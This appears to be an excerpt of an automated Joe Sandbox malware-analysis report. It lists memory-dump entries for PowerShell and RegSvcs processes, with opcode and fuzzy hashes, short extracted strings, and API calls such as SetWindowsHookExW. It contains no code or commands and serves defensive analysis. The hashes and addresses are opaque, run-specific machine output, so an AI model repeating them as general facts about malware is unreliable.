                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acc26204a20d43702bd88070cbc1a22a6d7a19041058ff92e0334f4c4f1dae22
                                      • Instruction ID: 792544584bd55f4d41eae10a60c74f813a49d8aa5f9be1fa725a7498cbe21e8e
                                      • Opcode Fuzzy Hash: acc26204a20d43702bd88070cbc1a22a6d7a19041058ff92e0334f4c4f1dae22
                                      • Instruction Fuzzy Hash: DA710321A0E7C94FD763977858745A57FE0EF5B264B0A01FBD088CB0F3DA59AA09C342
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dea5612a49ca625fe4549e1f35497ba3de649105f30f911f3962d0ee3fc701a
                                      • Instruction ID: 777d391ec691741eb139c84dd64138324e9bfa72f2560630967e6a0e2ef3ad0e
                                      • Opcode Fuzzy Hash: 7dea5612a49ca625fe4549e1f35497ba3de649105f30f911f3962d0ee3fc701a
                                      • Instruction Fuzzy Hash: 42513472F1FA4A4FE7659B2C98A56E873E0EF58350F1401FAD45CC32D6DE246D428781
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23adcd9e364138dfd7a0fef179e674c27ebfb3506521c791f71fefa70ee4b4b3
                                      • Instruction ID: 7c5c90c881d497d56be702bb5633713a14c30a0bcf3960d222e269f18870a578
                                      • Opcode Fuzzy Hash: 23adcd9e364138dfd7a0fef179e674c27ebfb3506521c791f71fefa70ee4b4b3
                                      • Instruction Fuzzy Hash: 12614773F0E6890FE764EB9888616A8B7D0EF59350F0502FED45CC71E7DD2469458781
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6e6253cd7f465d41bb0782a9528fb611e38db00f1787a44d0f2e89443ca0ecdb
                                      • Instruction ID: 909e7983582bbcf508d249bceb6115a641daf7fa2b84000999044634013879c1
                                      • Opcode Fuzzy Hash: 6e6253cd7f465d41bb0782a9528fb611e38db00f1787a44d0f2e89443ca0ecdb
                                      • Instruction Fuzzy Hash: 02512836B0EB890FE7A5EB6888616B8B7D1EF59310F0801BED45CC72D7DE286D458741
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565f95fb4f97c8f150baf862d2cdbcfbae14a745862a16c6cc387c530fa53771
                                      • Instruction ID: 77e13c68f2893d04101b557a791ef4557ebcbf37b4493ebe70e43dbbd2a861b1
                                      • Opcode Fuzzy Hash: 565f95fb4f97c8f150baf862d2cdbcfbae14a745862a16c6cc387c530fa53771
                                      • Instruction Fuzzy Hash: E3512A32B0F7890FEBA5EB5888656A8B7E1EF69350F0801BED45C871E7CE246D458741
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a19bbae68b8f931f030d83ad5e1f8ca21b5b19830d463ee18d4a6a084db2d400
                                      • Instruction ID: 904c7d71079efd6bd7a9420de649e1df623bf488d434026c55c16c1b5da9093d
                                      • Opcode Fuzzy Hash: a19bbae68b8f931f030d83ad5e1f8ca21b5b19830d463ee18d4a6a084db2d400
                                      • Instruction Fuzzy Hash: 79513872F0E7894FE7A9EB5888615A8B7D1EF69350F1801FED05CC71E3CE2869458741
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 03dc7234329756a6c7dfd167ce1f3442e8e40e3fac00ece023e9f8fc03eeb88b
                                      • Instruction ID: 0f00297d4994f00a91b7a43f7e723ffe09e3c43fe9e70b3014587d7125178f21
                                      • Opcode Fuzzy Hash: 03dc7234329756a6c7dfd167ce1f3442e8e40e3fac00ece023e9f8fc03eeb88b
                                      • Instruction Fuzzy Hash: 6F512B72B0EB894FE765EB5888B25A8B7D1FF5A360F0901BDD05C871E3CE2469458741
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81da6925c945dd39d53cabda144de35140ebe39d16adc1f44ed873debd7d02fa
                                      • Instruction ID: a279c6a3515304fe184878b9e05bfa408e84f7cfcefa9814bc34f033a564a4e2
                                      • Opcode Fuzzy Hash: 81da6925c945dd39d53cabda144de35140ebe39d16adc1f44ed873debd7d02fa
                                      • Instruction Fuzzy Hash: 72414963B0EA860BF764D7AC586A6A8B7D1EF99250F1806FED09CC71E7DD147901C381
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793b4a4f2b73f15d6122cb1764bfc16cdebd35e46c4bd19ab89d0a88e736a26e
                                      • Instruction ID: 6876718420508b064b981bd6cd74a767e82b45b3b233ca12f3b9a524dc865508
                                      • Opcode Fuzzy Hash: 793b4a4f2b73f15d6122cb1764bfc16cdebd35e46c4bd19ab89d0a88e736a26e
                                      • Instruction Fuzzy Hash: 42414923B0FA8A1FF765D7A848656A977D1EF59310F1802FED05C871E7DE286C058781
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d389e020fa6438ddd3704e7a008520ca076ec4119a16af4d97d44bf2606b28f
                                      • Instruction ID: 39d1013bf7685f945dcc050a55269f08af49ce18cd56a962664942256f7c452f
                                      • Opcode Fuzzy Hash: 9d389e020fa6438ddd3704e7a008520ca076ec4119a16af4d97d44bf2606b28f
                                      • Instruction Fuzzy Hash: 14311362B0FAC90FE7A69BAC58715B87BD1EF5A290B0905FFD049C71E7D909AC498301
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750084634.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76c4446031641f25b0fe2d6d0e31f59eeeba82e3184c657397d7279ae1cd8d15
                                      • Instruction ID: 62ecf17934c964ce4027e0fe8209834f0a951a8087e7747e25afa1e67e4951d9
                                      • Opcode Fuzzy Hash: 76c4446031641f25b0fe2d6d0e31f59eeeba82e3184c657397d7279ae1cd8d15
                                      • Instruction Fuzzy Hash: 8F310A31A18A4D8FDF98EF58C495EAD77E1FF68300F140169E40DD7295CA75E882CB81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4cd45ee86152b90c8511a7cfda19a4fabe828e31b943515bbef7fe8a4bee7d76
                                      • Instruction ID: b74a55a2ee878a2d5c541aaac3d40939ca24082c20b8a4834fa16eeca55b7a1a
                                      • Opcode Fuzzy Hash: 4cd45ee86152b90c8511a7cfda19a4fabe828e31b943515bbef7fe8a4bee7d76
                                      • Instruction Fuzzy Hash: 5C214C72A1EBCC5FEB65DF6898514A87BD0EF1975070400BFD48A871A3E934BC448782
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ad70a11a70ac12ec00a523ce4e8db15a7beb304ed4100b9d5afb5b68e4d3d08
                                      • Instruction ID: 2a7537d49e9b3f750fafe8a59b80b44337e2a49ffa1714f25f3092d0813396e9
                                      • Opcode Fuzzy Hash: 3ad70a11a70ac12ec00a523ce4e8db15a7beb304ed4100b9d5afb5b68e4d3d08
                                      • Instruction Fuzzy Hash: 2221B372B1F7894FE765E75898665E8B7E0EF59320F0402FAD05D831E2DA2429418B41
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ea4f0380f388e8bdde182b56c9c2e6791a04bf3e6569656db2feea9176c659a
                                      • Instruction ID: 2cf2550c65c2b8706ef9cb7e6b3e92cf05c4e18aed2434f3bbb9c107cf0038b1
                                      • Opcode Fuzzy Hash: 1ea4f0380f388e8bdde182b56c9c2e6791a04bf3e6569656db2feea9176c659a
                                      • Instruction Fuzzy Hash: 1C11F323B0E6890FEB65E76848A25ECB7A1FF55210F0802BEE09D861E7DE1829408751
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea0c982dc9892a1bb015e1cc73d517beb3388591e6cb379fcd92c93ef72f51ae
                                      • Instruction ID: e68f689069cd099bb65b5f805a161ec4b7ad16cdb63ee6356a70474ab99b336c
                                      • Opcode Fuzzy Hash: ea0c982dc9892a1bb015e1cc73d517beb3388591e6cb379fcd92c93ef72f51ae
                                      • Instruction Fuzzy Hash: 0211E362A0FACD0FEBA6E768486C8657BD1DF1625074909FED489CB1E3E809AD44C381
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4450de449699a7b75d226daec69a0759b0b0c271d9067fcb78812f72706e8d8
                                      • Instruction ID: 7f7dcebdb610aee5521526e21e0f31d83a6fe729644c4cccbad37c35c32f168a
                                      • Opcode Fuzzy Hash: f4450de449699a7b75d226daec69a0759b0b0c271d9067fcb78812f72706e8d8
                                      • Instruction Fuzzy Hash: 1D110622B0FBCD0FEBA6E76808658657BD1DF1629074905FED449CB1E7DC19AD448381
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05c5bc230971960d0c5729e84d7313abd9a9de10c7bffc3086bab9324da986b7
                                      • Instruction ID: 6cf216767e1ff4544cd6acda55408a24e9e837f86ed78ec9f08cdbf148aefc49
                                      • Opcode Fuzzy Hash: 05c5bc230971960d0c5729e84d7313abd9a9de10c7bffc3086bab9324da986b7
                                      • Instruction Fuzzy Hash: 3E110A61B0FACD0FD7A6E76808759657FD1DF1526070905FED48DCB2E3D819AD448381
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17509b1e844a639475834504e146224958a8369eb0c0a010c46e4f75b65d790f
                                      • Instruction ID: d186ae73387cc8bd4c5689a590f53ef76bf84e66c518b13e3813ccdef383ce7b
                                      • Opcode Fuzzy Hash: 17509b1e844a639475834504e146224958a8369eb0c0a010c46e4f75b65d790f
                                      • Instruction Fuzzy Hash: 9001C422F1FA5E0FEBA5B7AC14395B861C2EF58250B6900FAE40DC75E7DD1CAD014340
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750084634.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction ID: fbb99fe331381098bda212ca1bbba3abb05b09ac2881a28005e605d1933a0678
                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction Fuzzy Hash: 6B01A73020CB0C4FDB88EF0CE051AA5B3E0FB85320F10056DE58AC36A1D632E882CB41
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1750425555.00007FFD9B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b820000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a63ad7a02fd3d6f0166e749adf68e81d1d8b7252df968c9301200e47b62e9caf
                                      • Instruction ID: 35b5cf4551274193ccd2e42ba6b049546be596b86a157010d6d2397c52e6029b
                                      • Opcode Fuzzy Hash: a63ad7a02fd3d6f0166e749adf68e81d1d8b7252df968c9301200e47b62e9caf
                                      • Instruction Fuzzy Hash: 2FF0FC21B1E50A4FEB78A748D5A54FC62C2EFC8250B6940FAD40DC2197DE16A8018240
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8c18378133ac3836ea23eb2e30b5e4f5623d562c806c6d97e372b20a67b0f8c
                                      • Instruction ID: 47d56e5789d7ec23ed51d9c121a752e719ce89623799d5e4a8175d2aa7995fba
                                      • Opcode Fuzzy Hash: c8c18378133ac3836ea23eb2e30b5e4f5623d562c806c6d97e372b20a67b0f8c
                                      • Instruction Fuzzy Hash: 4F520832B0EB8D4FE7669B6848646B47FE1EF56210F4A02FAD489C71F3D918AD05C385
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 9Q_H
                                      • API String ID: 0-2218632329
                                      • Opcode ID: 0b3e609d2ac934e046032d8159f3f404f1df33507500d9ad0d968f8a6fdc13b5
                                      • Instruction ID: e23120a6c40bac2178340e136cd6f556f9cb95211de228161d7d204ee1c02d63
                                      • Opcode Fuzzy Hash: 0b3e609d2ac934e046032d8159f3f404f1df33507500d9ad0d968f8a6fdc13b5
                                      • Instruction Fuzzy Hash: 4DE1453171DB4A4FEB98EB1CC4A5AF577E1FF95310B1502BED08AC72A7DA25E8428740
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3dbffbe90e8c82c271adfaf9a3da750231302bcbd79ed379013129a35f1ee9a
                                      • Instruction ID: d6ac33edc7d76028f8e7e1052b8f56d6d20a1254c921833906fea256d35a0c02
                                      • Opcode Fuzzy Hash: f3dbffbe90e8c82c271adfaf9a3da750231302bcbd79ed379013129a35f1ee9a
                                      • Instruction Fuzzy Hash: 4C321272B0EBC94FE7A6DB6848655A47FE1EF56210F0902FAD089C72F3D919AD05C381
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce9b0ffdd67d64e06d3358a85e64ff4a6f768d04a3cce47da8527b1cc2aa305b
                                      • Instruction ID: 332f86615f4f5f254e60d5a64df103d2abb1997ac1cfc31161efce23924f8f93
                                      • Opcode Fuzzy Hash: ce9b0ffdd67d64e06d3358a85e64ff4a6f768d04a3cce47da8527b1cc2aa305b
                                      • Instruction Fuzzy Hash: B5E10922B0E7CD4FE7669BA848651B47FE1EF56210B4902FFE489C71B3D918A906C385
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23501173ce7ff473ee98d1ceaeaa0cc0d4309b5e5946c7ae7222ba8d01cf43b7
                                      • Instruction ID: 2768a806f3b839a0a0b7384ee95e2159d58d70cb1ae533cbb8fb1955142d1d89
                                      • Opcode Fuzzy Hash: 23501173ce7ff473ee98d1ceaeaa0cc0d4309b5e5946c7ae7222ba8d01cf43b7
                                      • Instruction Fuzzy Hash: 2431A670E0934D8FE769CB6480656B8BBF1EF65350F1502BAD009DA2F3CA395A84CB11
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1975978849.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b7f0000_powershell.jbxd
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • String ID: &$5O_H$:$L
                                      • API String ID: 0-483364191
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • String ID: "$8$@$L
                                      • API String ID: 0-426383896

                                      Execution Graph

                                      Execution Coverage: 9.7%
                                      Dynamic/Decrypted Code Coverage: 100%
                                      Signature Coverage: 0%
                                      Total number of Nodes: 78
                                      Total number of Limit Nodes: 2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd

                                      Control-flow Graph

                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146764E,?,?,?,?,?), ref: 0146770F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0

                                      Control-flow Graph

                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146764E,?,?,?,?,?), ref: 0146770F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0

                                      Control-flow Graph

                                      APIs
                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01462383
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0

                                      Control-flow Graph

                                      APIs
                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01462383
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0

                                      Control-flow Graph

                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0146D3DD
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0

                                      Control-flow Graph

                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0146D3DD
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Similarity
                                      • String ID: Te^q
                                      • API String ID: 0-671973202

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Similarity
                                      • String ID: Te^q
                                      • API String ID: 0-671973202
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123401061.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_11fd000_RegSvcs.jbxd
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123549121.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_120d000_RegSvcs.jbxd
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123401061.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_11fd000_RegSvcs.jbxd
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123549121.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_120d000_RegSvcs.jbxd